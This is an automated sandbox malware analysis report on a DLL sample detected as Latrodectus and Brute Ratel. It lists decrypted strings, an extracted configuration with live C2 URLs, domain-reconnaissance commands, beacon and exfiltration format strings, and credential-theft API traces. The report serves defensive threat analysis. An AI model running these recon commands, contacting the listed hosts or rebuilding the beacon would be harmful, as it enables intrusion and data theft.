Windows Analysis Report
wait.dll.dll

Overview

General Information

Sample name: wait.dll.dll
(renamed file extension from exe to dll)
Original sample name: wait.dll.exe
Analysis ID: 1566852
MD5: 50bd4ff60c931861e46c801a60f9e916
SHA1: 13b14fb516fa726cc5fa9af17a2f93ff49449830
SHA256: f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
Tags: exe, TA578, user-k3dg3___

Detection

BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Injects a PE file into foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Uses whoami command line tool to query computer and username
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapter information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3032 cmdline: loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4836 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 412 cmdline: rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4084 cmdline: rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 3780 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 4352 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • cmd.exe (PID: 4372 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 5040 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
            • WmiPrvSE.exe (PID: 3848 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 6332 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 2696 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 3424 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 4284 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 5012 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 2684 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 1216 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 1896 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 4332 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5620 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 6508 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 4424 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2860 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5264 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 2464 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 1480 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 5756 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • findstr.exe (PID: 4464 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 3252 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • whoami.exe (PID: 1880 cmdline: whoami /groups MD5: A4A6924F3EAF97981323703D38FD99C4)
    • rundll32.exe (PID: 6564 cmdline: rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

{"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
Source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Author: Joe Security
Source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Author: Joe Security
Source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Author: Joe Security
Source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Author: Joe Security
Source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Author: Joe Security

System Summary

Source: Process started. Author: elhoim, CD_ROM_. Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4084, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 1028, ProcessName: explorer.exe
Source: Process started. Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems). Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4332, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5620, ProcessName: net.exe
Source: Process started. Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community. Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: /c whoami /groups, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3252, ParentProcessName: cmd.exe, ProcessCommandLine: whoami /groups, ProcessId: 1880, ProcessName: whoami.exe
Source: Process started. Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements). Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5012, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2684, ProcessName: net.exe
Source: Process started. Author: Endgame, JHasenbusch (ported for oscd.community). Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5012, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2684, ProcessName: net.exe
Source: Process started. Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'. Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1028, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 3780, ProcessName: cmd.exe


AV Detection

Source: 8.2.explorer.exe.3030000.0.unpack, Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c ipconfig /all
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c systeminfo
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c nltest /domain_trusts
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c net view /all
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c net view /all /domain
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &ipconfig=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c net group "Domain Admins" /domain
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c net config workstation
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: /c whoami /groups
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &systeminfo=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &domain_trusts=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &domain_trusts_all=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &net_view_all_domain=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &net_view_all=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &net_group=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &wmic=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &net_config_ws=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &net_wmic_av=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &whoami_group=
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: &proclist=[
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack, String decryptor: "subproc": [
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &desklinks=[
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: *.*
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%s"
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Update_%x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Custom_update
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: .dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: .exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Error
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: runnung
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s/%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: front
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /files/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Lambda
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Cookie:
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: POST
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: GET
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: curl/7.88.1
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: CLEARURL
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: URLS
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: COMMAND
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: ERROR
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: [{"data":"
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "}]
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &dpost=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: https://reateberam.com/test/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: https://dogirafer.com/test/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \*.dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: AppData
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Desktop
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Startup
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Personal
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Local AppData
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: <html>
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: <!DOCTYPE
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s%d.dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Length: 0
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/dns-message
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &stiller=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s%d.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %x%x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &mac=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %02x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: :%02x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &computername=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &domain=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: LogonTrigger
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \Registry\Machine\
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: TimeTrigger
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: PT0H%02dM
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: PT0S
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \update_data.dat
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7AC00 CryptStringToBinaryA,swprintf,LocalAlloc,swprintf,CryptStringToBinaryA,swprintf,CryptDecodeObjectEx,swprintf,LocalAlloc,swprintf,CryptDecodeObjectEx,swprintf,CryptImportPublicKeyInfoEx2,swprintf,LocalAlloc,swprintf,swprintf,swprintf,BCryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00007FF8A8D7AC00
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7CEB0 BCryptOpenAlgorithmProvider,swprintf,BCryptGetProperty,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptExportKey,swprintf,3_2_00007FF8A8D7CEB0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7C3D0 BCryptOpenAlgorithmProvider,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapFree,BCryptDestroyHash,BCryptCloseAlgorithmProvider,3_2_00007FF8A8D7C3D0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7B720 swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptDecrypt,swprintf,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,BCryptDestroyKey,3_2_00007FF8A8D7B720
            Source: C:\Windows\explorer.exeCode function: 8_2_0E455E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,8_2_0E455E5C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E455FE4 CryptUnprotectData,8_2_0E455FE4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C60 CryptUnprotectData,8_2_0E515C60
            Source: C:\Windows\explorer.exeCode function: 8_2_0E458568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,8_2_0E458568
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,8_2_0E45453C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,8_2_0E456078
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2
            Source: wait.dll.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
            Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll

            Spreading

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
